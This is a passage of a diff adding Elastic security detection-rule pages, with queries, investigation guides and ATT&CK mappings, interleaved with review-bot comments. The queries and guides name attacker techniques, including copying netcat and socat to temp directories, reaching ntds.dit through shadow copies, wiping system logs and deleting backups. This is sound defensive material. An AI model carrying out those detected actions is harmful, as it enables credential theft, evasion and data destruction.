environment for additional compromised hosts. + - Implement temporary network rules, procedures, and segmentation to contain the malware. + - Stop suspicious processes. + - Immediately block the identified indicators of compromise (IoCs). 
+ - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system. +- Remove and block malicious artifacts identified during triage. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). + +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "windows" and event.type == "start" and + process.parent.name : "Zoom.exe" and process.name : ("cmd.exe", "powershell.exe", "pwsh.exe", "powershell_ise.exe") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Masquerading +** ID: T1036 +** Reference URL: https://attack.mitre.org/techniques/T1036/ +* Technique: +** Name: Process Injection +** ID: T1055 +** Reference URL: https://attack.mitre.org/techniques/T1055/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Exploitation for Client Execution +** ID: T1203 +** Reference URL: https://attack.mitre.org/techniques/T1203/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-symbolic-link-to-shadow-copy-created.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-symbolic-link-to-shadow-copy-created.asciidoc new file mode 100644 index 0000000000..d3e244df1d --- /dev/null 
+++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-symbolic-link-to-shadow-copy-created.asciidoc 
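Review bot: The ATT&CK block in the Suspicious Zoom Child Process file maps the rule to Process Injection (T1055), but the query only matches `process.parent.name : "Zoom.exe"` spawning `cmd.exe`, `powershell.exe`, `pwsh.exe` or `powershell_ise.exe`; nothing in the query observes injection, so either drop T1055 or say in the guide's description (which mentions only masquerading and a vulnerability in the application) why that technique applies. The "Investigating Suspicious Zoom Child Process" paragraph could also point out that `process.parent.name` is a name match only, so a parent merely named `Zoom.exe` in an unexpected path is exactly the masquerading case that the first investigation step (executable location and signature) is meant to confirm.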
@@ -0,0 +1,146 @@ +[[prebuilt-rule-8-10-5-symbolic-link-to-shadow-copy-created]] +=== Symbolic Link to Shadow Copy Created + +Identifies the creation of symbolic links to a shadow copy. Symbolic links can be used to access files in the shadow copy, including sensitive files such as ntds.dit, System Boot Key and browser offline credentials. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-endpoint.events.* +* logs-windows.* +* endgame-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/mklink +* https://2017.zeronights.org/wp-content/uploads/materials/ZN17_Kheirkhabarov_Hunting_for_Credentials_Dumping_in_Windows_Environment.pdf +* https://blog.netwrix.com/2021/11/30/extracting-password-hashes-from-the-ntds-dit-file/ +* https://www.hackingarticles.in/credential-dumping-ntds-dit/ + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Credential Access +* Resources: Investigation Guide +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 107 + +*Rule authors*: + +* Elastic +* Austin Songer + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating Symbolic Link to Shadow Copy Created + +Shadow copies are backups or snapshots of an endpoint's files or volumes while they are in use. Adversaries may attempt to discover and create symbolic links to these shadow copies in order to copy sensitive information offline. 
If Active Directory (AD) is in use, often the ntds.dit file is a target as it contains password hashes, but an offline copy is needed to extract these hashes and potentially conduct lateral movement. + +#### Possible investigation steps + +- Identify the user account that performed the action and whether it should perform this kind of action. +- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures. +- Investigate other alerts associated with the user/host during the past 48 hours. +- Determine if a volume shadow copy was recently created on this endpoint. +- Review privileges of the end user as this requires administrative access. +- Verify if the ntds.dit file was successfully copied and determine its copy destination. +- Investigate for registry SYSTEM file copies made recently or saved via Reg.exe. +- Investigate recent deletions of volume shadow copies. +- Identify other files potentially copied from volume shadow copy paths directly. + +### False positive analysis + +- This rule should cause very few false positives. Benign true positives (B-TPs) can be added as exceptions if necessary. + +### Related rules + +- NTDS or SAM Database File Copied - 3bc6deaa-fbd4-433a-ae21-3e892f95624f + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. +- If the entire domain or the `krbtgt` user was compromised: + - Activate your incident response plan for total Active Directory compromise which should include, but not be limited to, a password reset (twice) of the `krbtgt` user. 
+- Locate and remove static files copied from volume shadow copies. +- Command-Line tool mklink should require administrative access by default unless in developer mode. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). + +Ensure advanced audit policies for Windows are enabled, specifically: +Object Access policies [Event ID 4656](https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4656) (Handle to an Object was Requested) + +``` +Computer Configuration > +Policies > +Windows Settings > +Security Settings > +Advanced Audit Policies Configuration > +System Audit Policies > +Object Access > +Audit File System (Success,Failure) +Audit Handle Manipulation (Success,Failure) +``` + +This event will only trigger if symbolic links are created from a new process spawning cmd.exe or powershell.exe with the correct arguments. +Direct access to a shell and calling symbolic link creation tools will not generate an event matching this rule. + +If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work. 
+---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "windows" and event.type == "start" and + process.pe.original_file_name in ("Cmd.Exe","PowerShell.EXE") and + + /* Create Symbolic Link to Shadow Copies */ + process.args : ("*mklink*", "*SymbolicLink*") and process.command_line : ("*HarddiskVolumeShadowCopy*") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Credential Access +** ID: TA0006 +** Reference URL: https://attack.mitre.org/tactics/TA0006/ +* Technique: +** Name: OS Credential Dumping +** ID: T1003 +** Reference URL: https://attack.mitre.org/techniques/T1003/ +* Sub-technique: +** Name: Security Account Manager +** ID: T1003.002 +** Reference URL: https://attack.mitre.org/techniques/T1003/002/ +* Sub-technique: +** Name: NTDS +** ID: T1003.003 +** Reference URL: https://attack.mitre.org/techniques/T1003/003/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-system-binary-copied-and-or-moved-to-suspicious-directory.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-system-binary-copied-and-or-moved-to-suspicious-directory.asciidoc new file mode 100644 index 0000000000..9e91dd19dd --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-system-binary-copied-and-or-moved-to-suspicious-directory.asciidoc 
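Review bot: The Symbolic Link to Shadow Copy Created query limits shells to `process.pe.original_file_name in ("Cmd.Exe","PowerShell.EXE")`, while the Zoom and System Shells rules in this same patch also cover `pwsh.exe` and `powershell_ise.exe`; if PowerShell 7 hosts are in scope, the `in` list should include the corresponding original file name, and the guide's sentence "This event will only trigger if symbolic links are created from a new process spawning cmd.exe or powershell.exe" should be kept in step with whatever the list contains. The response step "Command-Line tool mklink should require administrative access by default unless in developer mode" reads as a statement of fact rather than an action; rephrase it as a check (confirm that Developer Mode, which lets non-administrators create symbolic links, is not enabled on the affected workstation) or move it to the False positive analysis section.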
@@ -0,0 +1,93 @@ +[[prebuilt-rule-8-10-5-system-binary-copied-and-or-moved-to-suspicious-directory]] +=== System Binary Copied and/or Moved to Suspicious Directory + +This rule monitors for the copying or moving of a system binary to a suspicious directory. Adversaries may copy/move and rename system binaries to evade detection. Copying a system binary to a different location should not occur often, so if it does, the activity should be investigated. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Data Source: Elastic Defend + +*Version*: 2 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +sequence by host.id, process.entity_id with maxspan=1s + [process where host.os.type == "linux" and event.action == "exec" and event.type == "start" and + process.name in ("cp", "mv") and process.args : ( + // Shells + "/bin/*sh", "/usr/bin/*sh", + + // Interpreters + "/bin/python*", "/usr/bin/python*", "/bin/php*", "/usr/bin/php*", "/bin/ruby*", "/usr/bin/ruby*", "/bin/perl*", + "/usr/bin/perl*", "/bin/lua*", "/usr/bin/lua*", "/bin/java*", "/usr/bin/java*", + + // Compilers + "/bin/gcc*", "/usr/bin/gcc*", "/bin/g++*", "/usr/bin/g++*", "/bin/cc", "/usr/bin/cc", + + // Suspicious utilities + "/bin/nc", "/usr/bin/nc", "/bin/ncat", "/usr/bin/ncat", "/bin/netcat", "/usr/bin/netcat", "/bin/nc.openbsd", + "/usr/bin/nc.openbsd", "/bin/*awk", "/usr/bin/*awk", "/bin/socat", "/usr/bin/socat", "/bin/openssl", + "/usr/bin/openssl", "/bin/telnet", "/usr/bin/telnet", "/bin/mkfifo", "/usr/bin/mkfifo", "/bin/mknod", 
+ "/usr/bin/mknod", "/bin/ping*", "/usr/bin/ping*", "/bin/nmap", "/usr/bin/nmap", + + // System utilities + "/bin/ls", "/usr/bin/ls", "/bin/cat", "/usr/bin/cat", "/bin/sudo", "/usr/bin/sudo", "/bin/curl", "/usr/bin/curl", + "/bin/wget", "/usr/bin/wget", "/bin/tmux", "/usr/bin/tmux", "/bin/screen", "/usr/bin/screen", "/bin/ssh", + "/usr/bin/ssh", "/bin/ftp", "/usr/bin/ftp" + ) and not process.parent.name in ("dracut-install", "apticron", "generate-from-dir", "platform-python")] + [file where host.os.type == "linux" and event.action == "creation" and file.path : ( + "/dev/shm/*", "/run/shm/*", "/tmp/*", "/var/tmp/*", "/run/*", "/var/run/*", "/var/www/*", "/proc/*/fd/*" + )] + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Hide Artifacts +** ID: T1564 +** Reference URL: https://attack.mitre.org/techniques/T1564/ +* Technique: +** Name: Masquerading +** ID: T1036 +** Reference URL: https://attack.mitre.org/techniques/T1036/ +* Sub-technique: +** Name: Rename System Utilities +** ID: T1036.003 +** Reference URL: https://attack.mitre.org/techniques/T1036/003/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-system-log-file-deletion.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-system-log-file-deletion.asciidoc new file mode 100644 index 0000000000..3b24aebc16 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-system-log-file-deletion.asciidoc 
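Review bot: The first sequence step of the System Binary Copied and/or Moved to Suspicious Directory query only matches `process.args` that contain the absolute paths listed (`/bin/*sh`, `/usr/bin/python*`, ...), so a copy invoked with a relative path or from inside `/usr/bin` does not satisfy the step; that is a reasonable trade-off for a low-severity rule, but it belongs in the description, which currently says "Copying a system binary to a different location should not occur often" without the caveat. The destination list in the second step also contains `/run/*` and `/var/run/*` in addition to `/run/shm/*`, which will match installer and service scratch directories; the `process.parent.name` exclusions (`dracut-install`, `apticron`, `generate-from-dir`, `platform-python`) suggest this was already seen in testing, so a short comment in the query recording why those four parents are exempt would help the next reviewer.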
@@ -0,0 +1,83 @@ +[[prebuilt-rule-8-10-5-system-log-file-deletion]] +=== System Log File Deletion + +Identifies the deletion of sensitive Linux system logs. This may indicate an attempt to evade detection or destroy forensic evidence on a system. + +*Rule type*: eql + +*Rule indices*: + +* auditbeat-* +* logs-endpoint.events.* +* endgame-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.fireeye.com/blog/threat-research/2020/11/live-off-the-land-an-overview-of-unc1945.html + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 108 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +file where host.os.type == "linux" and event.type == "deletion" and + file.path : + ( + "/var/run/utmp", + "/var/log/wtmp", + "/var/log/btmp", + "/var/log/lastlog", + "/var/log/faillog", + "/var/log/syslog", + "/var/log/messages", + "/var/log/secure", + "/var/log/auth.log", + "/var/log/boot.log", + "/var/log/kern.log" + ) and + not process.name in ("gzip", "executor", "dockerd") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Indicator Removal +** ID: T1070 +** Reference URL: https://attack.mitre.org/techniques/T1070/ +* Sub-technique: +** Name: Clear Linux or Mac System Logs +** ID: T1070.002 +** Reference URL: https://attack.mitre.org/techniques/T1070/002/ 
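Review bot: The exclusion `not process.name in ("gzip", "executor", "dockerd")` in the System Log File Deletion query is keyed on the process name alone, and `executor` in particular is a generic name with no comment explaining which product it belongs to; since another rule in this patch (System Binary Copied and/or Moved to Suspicious Directory) is built on the premise that adversaries rename system binaries, consider anchoring the exemption on `process.executable` paths or at least adding a comment naming the source of each excluded process. The description ("Identifies the deletion of sensitive Linux system logs") also does not say which legitimate tools are expected to remove these files, so a sentence listing them would make the exclusion list auditable.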
diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-system-shells-via-services.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-system-shells-via-services.asciidoc new file mode 100644 index 0000000000..23e59745e6 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-system-shells-via-services.asciidoc 
@@ -0,0 +1,137 @@ +[[prebuilt-rule-8-10-5-system-shells-via-services]] +=== System Shells via Services + +Windows services typically run as SYSTEM and can be used as a privilege escalation opportunity. Malware or penetration testers may run a shell as a service to gain SYSTEM permissions. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-endpoint.events.* +* logs-windows.* +* endgame-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Persistence +* Tactic: Execution +* Resources: Investigation Guide +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 108 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating System Shells via Services + +Attackers may configure existing services or create new ones to execute system shells to elevate their privileges from administrator to SYSTEM. They can also configure services to execute these shells with persistence payloads. + +This rule looks for system shells being spawned by `services.exe`, which is compatible with the above behavior. + +> **Note**: +> This investigation guide uses the {security-guide}/security/master/invest-guide-run-osquery.html[Osquery Markdown Plugin] introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide. + +#### Possible investigation steps + +- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures. +- Identify how the service was created or modified. Look for registry changes events or Windows events related to service activities (for example, 4697 and/or 7045). + - Examine the created and existent services, the executables or drivers referenced, and command line arguments for suspicious entries. + - !{osquery{"label":"Osquery - Retrieve All Services","query":"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services"}} + - !{osquery{"label":"Osquery - Retrieve Services Running on User Accounts","query":"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\nuser_account == null)\n"}} + - !{osquery{"label":"Osquery - Retrieve Service Unsigned Executables with Virustotal Link","query":"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\n"}} + - Retrieve the referenced files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc. +- Identify the user account that performed the action and whether it should perform this kind of action. +- Contact the account owner and confirm whether they are aware of this activity. +- Investigate other alerts associated with the user/host during the past 48 hours. 
+- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts. +- Check for commands executed under the spawned shell. + +### False positive analysis + +- This activity should not happen legitimately. The security team should address any potential benign true positive (B-TP), as this configuration can put the user and the domain at risk. + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. +- Isolate the involved host to prevent further post-compromise behavior. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. +- Delete the service or restore it to the original configuration. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). 
+ +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "windows" and event.type == "start" and + process.parent.name : "services.exe" and + process.name : ("cmd.exe", "powershell.exe", "pwsh.exe", "powershell_ise.exe") and + + /* Third party FP's */ + not process.args : "NVDisplay.ContainerLocalSystem" + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Create or Modify System Process +** ID: T1543 +** Reference URL: https://attack.mitre.org/techniques/T1543/ +* Sub-technique: +** Name: Windows Service +** ID: T1543.003 +** Reference URL: https://attack.mitre.org/techniques/T1543/003/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: PowerShell +** ID: T1059.001 +** Reference URL: https://attack.mitre.org/techniques/T1059/001/ +* Sub-technique: +** Name: Windows Command Shell +** ID: T1059.003 +** Reference URL: https://attack.mitre.org/techniques/T1059/003/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-temporarily-scheduled-task-creation.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-temporarily-scheduled-task-creation.asciidoc new file mode 100644 index 0000000000..0743e53976 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-temporarily-scheduled-task-creation.asciidoc 
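Review bot: The `/* Third party FP's */` exclusion `not process.args : "NVDisplay.ContainerLocalSystem"` in the System Shells via Services query exempts any `services.exe`-spawned shell whose arguments contain that string, regardless of executable path or signer; tightening it to the specific executable seen in the false positive, or documenting the NVIDIA display container case in the False positive analysis section (which currently states "This activity should not happen legitimately"), would keep the exemption no broader than the observed benign case. Minor wording in the investigation steps: "registry changes events" should read "registry change events" and "created and existent services" should read "created and existing services".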
@@ -0,0 +1,81 @@ +[[prebuilt-rule-8-10-5-temporarily-scheduled-task-creation]] +=== Temporarily Scheduled Task Creation + +Indicates the creation and deletion of a scheduled task within a short time interval. Adversaries can use these to proxy malicious execution via the schedule service and perform clean up. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-system.* +* logs-windows.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4698 + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Persistence +* Tactic: Execution + +*Version*: 7 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +sequence by winlog.computer_name, winlog.event_data.TaskName with maxspan=5m + [iam where event.action == "scheduled-task-created" and not user.name : "*$"] + [iam where event.action == "scheduled-task-deleted" and not user.name : "*$"] + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Scheduled Task/Job +** ID: T1053 +** Reference URL: https://attack.mitre.org/techniques/T1053/ +* Sub-technique: +** Name: Scheduled Task +** ID: T1053.005 +** Reference URL: https://attack.mitre.org/techniques/T1053/005/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Scheduled Task/Job +** ID: T1053 +** Reference URL: https://attack.mitre.org/techniques/T1053/ +* Sub-technique: +** Name: Scheduled Task +** ID: T1053.005 +** 
Reference URL: https://attack.mitre.org/techniques/T1053/005/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-third-party-backup-files-deleted-via-unexpected-process.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-third-party-backup-files-deleted-via-unexpected-process.asciidoc new file mode 100644 index 0000000000..1ee8b35c3c --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-third-party-backup-files-deleted-via-unexpected-process.asciidoc 
@@ -0,0 +1,131 @@ +[[prebuilt-rule-8-10-5-third-party-backup-files-deleted-via-unexpected-process]] +=== Third-party Backup Files Deleted via Unexpected Process + +Identifies the deletion of backup files, saved using third-party software, by a process outside of the backup suite. Adversaries may delete Backup files to ensure that recovery from a ransomware attack is less likely. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-endpoint.events.* +* logs-windows.* +* endgame-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.advintel.io/post/backup-removal-solutions-from-conti-ransomware-with-love + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Impact +* Resources: Investigation Guide +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 108 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating Third-party Backup Files Deleted via Unexpected Process + +Backups are a significant obstacle for any ransomware operation. They allow the victim to resume business by performing data recovery, making them a valuable target. + +Attackers can delete backups from the host and gain access to backup servers to remove centralized backups for the environment, ensuring that victims have no alternatives to paying the ransom. + +This rule identifies file deletions performed by a process that does not belong to the backup suite and aims to delete Veritas or Veeam backups. + +#### Possible investigation steps + +- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures. +- Identify the user account that performed the action and whether it should perform this kind of action. +- Contact the account owner and confirm whether they are aware of this activity. +- Investigate other alerts associated with the user/host during the past 48 hours. +- Check if any files on the host machine have been encrypted. + +### False positive analysis + +- This rule can be triggered by the manual removal of backup files and by removal using other third-party tools that are not from the backup suite. Exceptions can be added for specific accounts and executables, preferably tied together. + +### Related rules + +- Deleting Backup Catalogs with Wbadmin - 581add16-df76-42bb-af8e-c979bfb39a59 +- Volume Shadow Copy Deleted or Resized via VssAdmin - b5ea4bfe-a1b2-421f-9d47-22a75a6f2921 +- Volume Shadow Copy Deletion via PowerShell - d99a037b-c8e2-47a5-97b9-170d076827c4 +- Volume Shadow Copy Deletion via WMIC - dc9c1f74-dac3-48e3-b47f-eb79db358f57 + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. +- Consider isolating the involved host to prevent destructive behavior, which is commonly associated with this activity. +- Perform data recovery locally or restore the backups from replicated copies (Cloud, other servers, etc.). +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. 
+- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +file where host.os.type == "windows" and event.type == "deletion" and + ( + /* Veeam Related Backup Files */ + (file.extension : ("VBK", "VIB", "VBM") and + not ( + process.executable : ("?:\\Windows\\*", "?:\\Program Files\\*", "?:\\Program Files (x86)\\*") and + (process.code_signature.trusted == true and process.code_signature.subject_name : "Veeam Software Group GmbH") + )) or + + /* Veritas Backup Exec Related Backup File */ + (file.extension : "BKF" and + not process.executable : ("?:\\Program Files\\Veritas\\Backup Exec\\*", + "?:\\Program Files (x86)\\Veritas\\Backup Exec\\*") and + not file.path : ("?:\\ProgramData\\Trend Micro\\*", + "?:\\Program Files (x86)\\Trend Micro\\*", + "?:\\$RECYCLE.BIN\\*")) + ) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Impact +** ID: TA0040 +** Reference URL: https://attack.mitre.org/tactics/TA0040/ +* Technique: +** Name: Inhibit System Recovery +** ID: T1490 +** Reference URL: https://attack.mitre.org/techniques/T1490/ +* Technique: +** Name: Data Destruction +** ID: T1485 +** Reference URL: https://attack.mitre.org/techniques/T1485/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-uac-bypass-attempt-via-elevated-com-internet-explorer-add-on-installer.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-uac-bypass-attempt-via-elevated-com-internet-explorer-add-on-installer.asciidoc new file mode 100644 index 0000000000..59c158edad --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-uac-bypass-attempt-via-elevated-com-internet-explorer-add-on-installer.asciidoc 
@@ -0,0 +1,108 @@ +[[prebuilt-rule-8-10-5-uac-bypass-attempt-via-elevated-com-internet-explorer-add-on-installer]] +=== UAC Bypass Attempt via Elevated COM Internet Explorer Add-On Installer + +Identifies User Account Control (UAC) bypass attempts by abusing an elevated COM Interface to launch a malicious program. Attackers may attempt to bypass UAC to stealthily execute code with elevated permissions. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-endpoint.events.* +* logs-windows.* +* endgame-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://swapcontext.blogspot.com/2020/11/uac-bypasses-from-comautoapprovallist.html + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Privilege Escalation +* Tactic: Defense Evasion +* Tactic: Execution +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 106 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- + +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "windows" and event.type == "start" and + process.executable : "C:\\*\\AppData\\*\\Temp\\IDC*.tmp\\*.exe" and + process.parent.name : "ieinstal.exe" and process.parent.args : "-Embedding" + + /* uncomment once in winlogbeat */ + /* and not (process.code_signature.subject_name == "Microsoft Corporation" and process.code_signature.trusted == true) */ + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Abuse Elevation 
